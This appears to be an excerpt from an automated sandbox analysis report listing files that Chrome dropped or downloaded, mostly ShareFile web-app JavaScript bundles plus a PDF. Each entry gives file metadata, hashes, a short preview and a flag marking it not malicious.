                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevthreatalertmgtpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"}).System.register(["react","@citrite/citrix-ui@25.46.0","tslib","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){r.AlertErrorIcon=e.AlertErrorIcon,r.Button=e.Button,r.Checkbox=e.Checkbox,r.CircleOutlinedXIcon=e.CircleOutlinedXIcon,r.EmptyState=e.EmptyState,r.LoadingPrimary=e.LoadingPrimary,r.PageTitle=e.PageTitle,r.SettingsField=e.SettingsField,r.ThemeColor=e.ThemeColor,r.Toggle=e.Toggle,r.fromThemeColors=e.fromThemeColors,r.notifyError=e.notifyError,r.notifySuccess=e.notifySuccess},function(e){o.__assign=e.__assign,o.__awaiter=e.__awaiter},function(e){i["default"]=e["default"],i.findDOMNode=e.findDOMNode,i.flushSync=e.flushSync}],execute:function(){e((()=>{var e={9272:(e,t,n)=>{"use strict";var r=n(723),o=[],i=[],a=r.makeRequestCallF
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:PDF document, version 1.7, 1 pages
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):27131
                                                                                                                                                                                                                      Entropy (8bit):7.489760917606285
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:BXF14U0IRunpZNvkWdhvqxzz6ndS3RUryEaZdW95fNb/CfOJQzcymuSktBMVvwCe:7GVoH6QEcBBDNn
                                                                                                                                                                                                                      MD5:701174856293323D7D21E2917EC903D4
                                                                                                                                                                                                                      SHA1:2D595D0008E9F62587D17CF443D09DFE9ABCC0B6
                                                                                                                                                                                                                      SHA-256:976AAAA1B224A9D5281FCE37DA54411CE4A87C1DD6CDD290D0E2F7F76E90FFFA
                                                                                                                                                                                                                      SHA-512:10C5762FA1B1BF9719CA6E2AD6DDCBB540E68898878DCC423DF65950D380EE8CF8348D532E781F762D60388B2A3B1A91E79A96828070A6EC1569488AF07817CA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:%PDF-1.7.%......189 0 obj.<< /Linearized 1 /L 27131 /H [ 1221 177 ] /O 195 /E 21724 /N 1 /T 26154 >>.endobj... .190 0 obj.<< /Type /XRef /Filter /FlateDecode /Length 161 /W [ 1 2 1 ] /Index [ 189 43 ]. /ID [<E5E386DCC5EA704CB4808DC725C50A10><32392D35462D43462D43352D44392D41>] . /Size 232 /Prev 26155 . /Root 191 0 R . /Info 2 0 R . /Encrypt 192 0 R . >>.stream.x...J.`...4JP3...E..A.V..BSC..A.....A.C.O!55..S........$.|...#3...K<~.........._`...c<.`.......7f../.^........9.&X..F..yl.....|...;?...C.m....W....Ul ..endstream..endobj. .191 0 obj.<</Type/Catalog/Pages 1 0 R/Lang(\341jkl\015)/StructTreeRoot 7 0 R/MarkInfo<</Marked true>>/Metadata 4 0 R/ViewerPreferences 193 0 R/Names 5 0 R>>..endobj..192 0 obj.<</Filter/Standard/O(6E\033\323\235u;|\035\020\222,\(\346fZ\244\3635?\2604\213Sh\
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65464)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1482911
                                                                                                                                                                                                                      Entropy (8bit):5.889391822283771
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24576:Vn9O7zqqrku7uOJM8wfSakb0zwT0611rsY+G8hzyjeGc8q:W7zqqrkUl5wfSawT0611rsY+G8hNGcR
                                                                                                                                                                                                                      MD5:514D63F3F284BF031A2EFD85CF5D7027
                                                                                                                                                                                                                      SHA1:3D7C7E1E045BF01305076602C5688F73D5EFBE5C
                                                                                                                                                                                                                      SHA-256:B1B12A07462EBB7E15E1FDDAD206153D52DB55A5ADAAC6C12D273E522BEEACCC
                                                                                                                                                                                                                      SHA-512:E50CC0BFE8D98F3287E10C3C8F7A74F284CFA370FB1D019E4CA87B67CD7AC3BFE4C77F27D00DBFD4D69BCE1F08EAD139793779D5B6EAEEAFBBDC1271D51C5780
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevworkflowspilet,{}).System.register(["react","antd","react-dom","tslib","@citrite/sf-api","react-router-dom","@sharefiledev/antd-config","react-router"],(function(e,t){var n={},r={},o={},a={},i={},s={},l={},c={};return Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){r.Alert=e.Alert,r.App=e.App,r.Avatar=e.Avatar,r.Badge=e.Badge,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Dropdown=e.Dropdown,r.Flex=e.Flex,r.Form=e.Form,r.Input=e.Input,r.List=e.List,r.Menu=e.Menu,r.Modal=e.Modal,r.Row=e.Row,r.Select=e.Select,r.Skeleton=e.Skeleton,r.Spin=e.Spin,r.Steps=e.Steps,r.Switch=e.Switch,r.Tabs=e.Tabs,r.Tooltip=e.Tooltip,r.Typography=e.Typography,r.notification=e.notification,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){a.__assign=e.__assign,a.__awaiter=e.__await
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (55320)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):55384
                                                                                                                                                                                                                      Entropy (8bit):5.402007343018523
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:Kt22vAtSxrvAfxISahJs3tp6f98kE7B38hJnrtOr:M53sbUOxl83nYr
                                                                                                                                                                                                                      MD5:D7FA53958E5BA828FEBE01A45075469E
                                                                                                                                                                                                                      SHA1:1AE6A7607029209F55A13F68B5CFDF1CCA95082B
                                                                                                                                                                                                                      SHA-256:44C772C0BDD957C95564D589FA388D7622B0CF17C20B2CAF21760E4FC66E0DC4
                                                                                                                                                                                                                      SHA-512:25462206E25766922831E0A667FF295F063E202EFE4B21271059CEC70F50AE241B9F205D58EAAE0CF6BAE3832B4D54154BD8695CD91B40ECD7EF4CD92187EA60
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevreviewapprovalpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var r={},n={},a={},o={},i={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){r.AccountsEntity=e.AccountsEntity,r.ContactListType=e.ContactListType,r.ContactsEntity=e.ContactsEntity,r.ItemsEntity=e.ItemsEntity,r.Uploader=e.Uploader,r.UserRole=e.UserRole,r.UsersEntity=e.UsersEntity,r.ZoneService=e.ZoneService,r.createFile=e.createFile},function(e){n.colorPalette=e.colorPalette,n.sizes=e.sizes},function(e){a.Alert=e.Alert,a.App=e.App,a.Avatar=e.Avatar,a.Button=e.Button,a.Checkbox=e.Checkbox,a.Col=e.Col,a.DatePicker=e.DatePicker,a.Divider=e.Divider,a.Dropdown=e.Dropdown,a.Flex=e.Flex,a.Form=e.Form,a.Input=e.Input,a.Modal=e.Modal,a.Row=e.Row,a.Select=e.Select,a.Space=e.Space,a.Spin=e.Spin,a.Steps=e.Steps,a.Tabs=e.Tabs,a.Tag=e.Tag,a.Tooltip=e.Tooltip,a.Typography=e.Typography,a.them
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (61276), with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):795817
                                                                                                                                                                                                                      Entropy (8bit):5.678759319464712
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:ihDAYuC5jEWpcOZ5bcU1OHP6a05t3HZo3cA3UTStt1RX0b+iVQEQK/XvFZdnGKpI:DYuC3pxz1Oia3cd+nUbfQuO
                                                                                                                                                                                                                      MD5:1EF237D0B6617D5D9E82D98839B65753
                                                                                                                                                                                                                      SHA1:02560680FCAF4E0465D229D2E2A46F3D81C834BD
                                                                                                                                                                                                                      SHA-256:5EB2E4375E3E1625F20F5E12F9CF0DDCC854166BB54F942D2F47003D86747AFC
                                                                                                                                                                                                                      SHA-512:B6D2EEE2E64F4F7752E91EB0BDA3A81550D685EDA4565F36580FF47D08450583A043BA1E7E015629D4ADF77BCB2DE8A695695025716FC0E51BEE76C33A6D8835
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/citrite-citrix-ui.js
                                                                                                                                                                                                                      Preview:System.register(["react","react-dom","tslib"],(function(e,t){var n={},r={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){r[t]=e[t]}))},function(e){o.__assign=e.__assign}],execute:function(){e((()=>{var e,a,i={1757:(e,t,n)=>{"use strict";n.d(t,{F2:()=>u,ST:()=>s,UB:()=>c,lU:()=>l,pq:()=>a});var r=n(1413),o=n(8211);function a(e,t){if(f()&&d(e)){var n=i();window.__citrixui_internal__=(0,r.Z)((0,r.Z)((0,r.Z)({},n),t),{},{instanceSymbol:e})}}function i(){if(f())return window.__citrixui_internal__}function l(){var e,t=i();return null!==(e=null==t?void 0:t.configuration)&&void 0!==e?e:o.O}function c(){var e,t=i();return null!==(e=null==t?void 0:t.onNotification)&&void 0!==e?e:h}function s(){var e,t=i();return null!==(e=null==t?void 0:t.showModal)&&void 0!==e?e:p}function u(e){f()&&d(e)&&delete window.__citrixui_
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65477)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):694747
                                                                                                                                                                                                                      Entropy (8bit):5.968637255720328
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:9bS+hSjHRA1XqG7Z1ep1IEUj8uqdUo4OB:9u+hU4XqG7ZU1Uj8uqVN
                                                                                                                                                                                                                      MD5:30F6FF4CC9B4CB4A5FC2BA1C682CCE69
                                                                                                                                                                                                                      SHA1:95DC0821774F314043A6ABEC663BDB1CE6E31C34
                                                                                                                                                                                                                      SHA-256:6B435B612F427B879177B34777497EFA3FBE15FB075541CAFAD9B000A6911D8E
                                                                                                                                                                                                                      SHA-512:F083DD24DA79446238A7061B03930DB29366C8F8061791833E442E0852481695A405C4A36AA3E25AE516D39B465FB2E63966866E24B6A9AE8FAA869F81CB4600
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevtemplatespilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},a={},i={},s={},o={},l={},u={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(s,"__esModule",{value:!0}),Object.defineProperty(u,"__esModule",{value:!0}),{setters:[function(e){n.ItemsEntity=e.ItemsEntity,n.Uploader=e.Uploader,n.UsersEntity=e.UsersEntity,n.ZoneService=e.ZoneService,n.createFile=e.createFile},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){a.Alert=e.Alert,a.App=e.App,a.Avatar=e.Avatar,a.Button=e.Button,a.Card=e.Card,a.Checkbox=e.Checkbox,a.Col=e.Col,a.Collapse=e.Collapse,a.Divider=e.Divider,a.Drawer=e.Drawer,a.Dropdown=e.Dropdown,a.Flex=e.Flex,a.Form=e.Form,a.Input=e.Input,a.Layout=e.Layout,a.List=e.List,a.Menu=e.Menu,a.Modal=e.Modal,a.Result=e.Result,a.Row=e.Row,a.Select=e.Select,a.Skeleton=e.Skeleton
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):98732
                                                                                                                                                                                                                      Entropy (8bit):5.344399340470534
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:Y6Z2P9/cG6kn0MO5lpt7ouF04pWX7HEFozgcH:gPTOXP7oum4w7RzRH
                                                                                                                                                                                                                      MD5:CDCA5117242386D7CABB8C5CDEE3F9A1
                                                                                                                                                                                                                      SHA1:E79CED8986A52C729CBBD2C876D0DC25C0FFD33D
                                                                                                                                                                                                                      SHA-256:579901D2E27F2ED03F94DE3602CF3A15EDB7C307E6D0E325E663A8A75C81B036
                                                                                                                                                                                                                      SHA-512:961A123E53AFFD196AF2F61AFF83A72DCC7EE36B98680ABB1EEE796FBE1409EC767B5E49652D9663EA10BF6C59EDB7A1B16E79CDB2D4D6A3F0E0337FE40D8666
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevbillingpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},a={},s={},u={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.AccountFeatures=e.AccountFeatures,n.Api=e.Api,n.BillingEntity=e.BillingEntity,n.CountriesEntity=e.CountriesEntity,n.CurrencyCode=e.CurrencyCode,n.PaymentAuthorizationEntity=e.PaymentAuthorizationEntity,n.UserRole=e.UserRole},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){i.Alert=e.Alert,i.App=e.App,i.Button=e.Button,i.Card=e.Card,i.Col=e.Col,i.Divider=e.Divider,i.Flex=e.Flex,i.Form=e.Form,i.Grid=e.Grid,i.Image=e.Image,i.Input=e.Input,i.InputNumber=e.InputNumber,i.Layout=e.Layout,i.Modal=e.Modal,i.Radio=e.Radio,i.Row=e.Row,i.Segmented=e.Segmented,i.Select=e.Select,i.Skeleton=e.Skeleton,i.Space=e.Space,i.Spin=e.Spin,i.Table=e.Table,i.Tag=e.T
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65477)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):694747
                                                                                                                                                                                                                      Entropy (8bit):5.968637255720328
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:9bS+hSjHRA1XqG7Z1ep1IEUj8uqdUo4OB:9u+hU4XqG7ZU1Uj8uqVN
                                                                                                                                                                                                                      MD5:30F6FF4CC9B4CB4A5FC2BA1C682CCE69
                                                                                                                                                                                                                      SHA1:95DC0821774F314043A6ABEC663BDB1CE6E31C34
                                                                                                                                                                                                                      SHA-256:6B435B612F427B879177B34777497EFA3FBE15FB075541CAFAD9B000A6911D8E
                                                                                                                                                                                                                      SHA-512:F083DD24DA79446238A7061B03930DB29366C8F8061791833E442E0852481695A405C4A36AA3E25AE516D39B465FB2E63966866E24B6A9AE8FAA869F81CB4600
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-templates-pilet/0.110.3/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevtemplatespilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},a={},i={},s={},o={},l={},u={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(s,"__esModule",{value:!0}),Object.defineProperty(u,"__esModule",{value:!0}),{setters:[function(e){n.ItemsEntity=e.ItemsEntity,n.Uploader=e.Uploader,n.UsersEntity=e.UsersEntity,n.ZoneService=e.ZoneService,n.createFile=e.createFile},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){a.Alert=e.Alert,a.App=e.App,a.Avatar=e.Avatar,a.Button=e.Button,a.Card=e.Card,a.Checkbox=e.Checkbox,a.Col=e.Col,a.Collapse=e.Collapse,a.Divider=e.Divider,a.Drawer=e.Drawer,a.Dropdown=e.Dropdown,a.Flex=e.Flex,a.Form=e.Form,a.Input=e.Input,a.Layout=e.Layout,a.List=e.List,a.Menu=e.Menu,a.Modal=e.Modal,a.Result=e.Result,a.Row=e.Row,a.Select=e.Select,a.Skeleton=e.Skeleton
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65474)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):650980
                                                                                                                                                                                                                      Entropy (8bit):5.518287641652362
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6144:xOq/TqppnEuBOn0ffoPNOAihD3YV3IV3lV3q0D4wVqGV3DV3kVqzVqd7lS048yF1:zyO0ffoPNqhD34m4H53cWfxcT
                                                                                                                                                                                                                      MD5:D46761310B3C627CC468F3B845E55ECA
                                                                                                                                                                                                                      SHA1:41E1ED698BAF4A8B5228B551175ABA04B1F3D573
                                                                                                                                                                                                                      SHA-256:ADE7ADA624732E91D0A25FBE9715B4628827176AD5ED40EDA779916A9C15CEC8
                                                                                                                                                                                                                      SHA-512:0EECBC74A272D297DEC3BCC12E3F52D2741B6DA0C97478438B640BA9A9BABF6DD47ADEA182D8F2C8561C6DD61FC7C00CB9DF2B583093EF30C761F8D65BA59E59
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevintegrationspilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.AutoComplete=e.AutoComplete,r.Avatar=e.Avatar,r.Badge=e.Badge,r.Button=e.Button,r.Col=e.Col,r.Collapse=e.Collapse,r.ConfigProvider=e.ConfigProvider,r.Divider=e.Divider,r.Drawer=e.Drawer,r.Flex=e.Flex,r.Form=e.Form,r.Input=e.Input,r.Layout=e.Layout,r.Menu=e.Menu,r.Modal=e.Modal,r.Row=e.Row,r.Select=e.Select,r.Space=e.Space,r.Spin=e.Spin,r.Table=e.Table,r.Tabs=e.Tabs,r.Tag=e.Tag,r.Typography=e.Typography,r.notification=e.notification,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){i["default"]=e["default"],i.findDOMNode=e.findDOMNode,i.flushSync=e.flushSync}],execute:function(){e((()=>{var e,a,s={9178:(e,t,n)=>{"use strict";function r(e){var t,n,r=argu
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65473)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):131500
                                                                                                                                                                                                                      Entropy (8bit):5.345244687137005
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:GAF3NWoK5wEzGmqmEwkOw1Gc34fOtB+7sAhgod64QUDs5aBzvT0ijJTak0JK8a/D:Gjosw7Oy734fOGjxakP8QkC
                                                                                                                                                                                                                      MD5:275AF639A62E1F77EA95FD60B6EA5296
                                                                                                                                                                                                                      SHA1:ADE0AB5543F039088DF130177EDD0D0898B7E4D7
                                                                                                                                                                                                                      SHA-256:58D80FF423BA00AFBEE0537681FA3C525030C84159056C280B4FD11A84556E53
                                                                                                                                                                                                                      SHA-512:F04AB97484B008372C702EED51D3B049C2828380C925571D2356891B37EC0A9DA552711370F0D725747F1C3DFDFD47B941ACBA1243E5897BAD57AE65C5EDA502
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevstoragepluginpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={},u={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(u,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.CapabilitiesEntity=e.CapabilitiesEntity,n.CapabilityName=e.CapabilityName,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,n.EncryptedEmailsEntity=e.EncryptedEmailsEntity,n.ExceptionReason=e.ExceptionReason,n.FileAction=e.FileAction,n.FileLockEntity=e.FileLockEntity,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations=e.ItemOperations,n.ItemOrderingMode=e.ItemO
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65240)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1807333
                                                                                                                                                                                                                      Entropy (8bit):5.530242831907712
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:fy4ADRmWrWPM23XctQto78wJCqNSRVmjSDAE8nz50M3Z31tN3TUOgxGFMaxNTA7a:ay3XctCmjSEEwFPjTnzk71o9yhEp
                                                                                                                                                                                                                      MD5:599A89980A09447AFF755BE20D4EACFD
                                                                                                                                                                                                                      SHA1:39E49E3A2631637C2180E693E0C49B07E92D0864
                                                                                                                                                                                                                      SHA-256:E98ECAB8292858BF3EB41813858007DB8EDABC4E97C88A3F6D38A66458E5B627
                                                                                                                                                                                                                      SHA-512:F7748698A944FCEFB2CECD05A9DC1CBEC7B1197C0223F9210C6B1B068BAFA19078A0F57F415E1E4CF001F620D90231A87414BEF1AA71275EF782E3EA60A71BE5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevdocgenpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(__WEBPACK_DYNAMIC_EXPORT__,__system_context__){var __WEBPACK_EXTERNAL_MODULE__8222__={},__WEBPACK_EXTERNAL_MODULE__4634__={},__WEBPACK_EXTERNAL_MODULE__4876__={},__WEBPACK_EXTERNAL_MODULE__4726__={},__WEBPACK_EXTERNAL_MODULE__1867__={},__WEBPACK_EXTERNAL_MODULE__2965__={},__WEBPACK_EXTERNAL_MODULE__8109__={};return Object.defineProperty(__WEBPACK_EXTERNAL_MODULE__4726__,"__esModule",{value:!0}),{setters:[function(e){__WEBPACK_EXTERNAL_MODULE__8222__.AccountsEntity=e.AccountsEntity,__WEBPACK_EXTERNAL_MODULE__8222__.Api=e.Api,__WEBPACK_EXTERNAL_MODULE__8222__.ContactListType=e.ContactListType,__WEBPACK_EXTERNAL_MODULE__8222__.ContactsEntity=e.ContactsEntity,__WEBPACK_EXTERNAL_MODULE__8222__.CustomWorkflowBundleType=e.CustomWorkflowBundleType,__WEBPACK_EXTERNAL_MODULE__8222__.FileVirusStatus=e.FileVirusStatu
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (48708)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):197483
                                                                                                                                                                                                                      Entropy (8bit):5.368235778531096
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:kocC0QmhQZTy7HaLn3tma17CZklGb2fFi+uC6EopJoHNoAHxHoHwHDHEHzzlzBq9:kVLQ4zlzX457oVQbOzCSq
                                                                                                                                                                                                                      MD5:22848DD2F996EF7B688FBC1CA0D957A1
                                                                                                                                                                                                                      SHA1:8C9D056B71B327AD7EF79611468E910A480F5B4E
                                                                                                                                                                                                                      SHA-256:C99418F90B1EBAEFF643C88B8528779D2AE882E1ED7560FD27FEA12FAC29C457
                                                                                                                                                                                                                      SHA-512:E193D93E98131767E8F2B6F3AA66B976DEB68A054644F7126257BEB675881918D149CB9921D7266C6D00E3C8253201E95979E7F740E8A3ACF6BD013A61D61C1B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dc-pilet/1.423.0/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevdcpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},a={},i={},o={},s={},l={},c={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.ContactListType=e.ContactListType,n.ItemsEntity=e.ItemsEntity,n.Uploader=e.Uploader,n.UserRole=e.UserRole,n.UsersEntity=e.UsersEntity,n.ZoneService=e.ZoneService,n.createFile=e.createFile},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){a.Badge=e.Badge,a.Button=e.Button,a.Card=e.Card,a.Col=e.Col,a.DatePicker=e.DatePicker,a.Drawer=e.Drawer,a.Dropdown=e.Dropdown,a.Flex=e.Flex,a.Form=e.Form,a.Image=e.Image,a.Input=e.Input,a.InputNumber=e.InputNumber,a.Modal=e.Modal,a.Popover=e.Popover,a.Row=e.Row,a.Select=e.Select,a.Skeleton=e.Skeleton,a.Space=e.Space,a.Spin=e.Spin,a
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):79
                                                                                                                                                                                                                      Entropy (8bit):3.9951663126378123
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:U3KTDW3MiLLUHcjVXlVBT7J:H6NLgHWXZT7J
                                                                                                                                                                                                                      MD5:97B958FA75E225CEA6FA3F3E399010D0
                                                                                                                                                                                                                      SHA1:4DDFF887AB1D6FFC1678A717F1327E6C0900B9F8
                                                                                                                                                                                                                      SHA-256:0C909725B0EA7DA9994F16E47A4142783410C5AA25CDD7770F85DC61EB8A170C
                                                                                                                                                                                                                      SHA-512:C8130E21AF2E53D9B3615EAF54714A1160C0D2D80629F4EC19108F307226FA62ED9A45D415041C649A9E2BC2631AF87DD0FC88792051B82096904D3A44166882
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:NREUM.setToken({'stn':0,'err':1,'ins':1,'spa':1,'sr':0,'srs':0,'st':1,'sts':0})
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65480)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):178957
                                                                                                                                                                                                                      Entropy (8bit):5.329232951768454
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:f9/b1XWD+4jgnz8nzvfWD34jsWDW4j+ZbfZbXWDG4jFnzbnz8ZBovwylOUuOB1OI:f9BYqZBovwyYU1B1OTM
                                                                                                                                                                                                                      MD5:826DA847895415A16E1D242AFD0F2BA7
                                                                                                                                                                                                                      SHA1:77C1F5AF0C7C230640B74C163313BE93427F3B51
                                                                                                                                                                                                                      SHA-256:8E68E217EEC68E833BE390E850C8E9DB8FE30FEA29AFEC22F2FF00CA3E80C25D
                                                                                                                                                                                                                      SHA-512:85E1368585DF066AF2BAC194AE9E1D611E7B973535659D83CB490273C294DEDBB180DC3DB5718225B5C660BD9A92DD3B4B8F999FA197EA6B48CF85F74B903F78
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
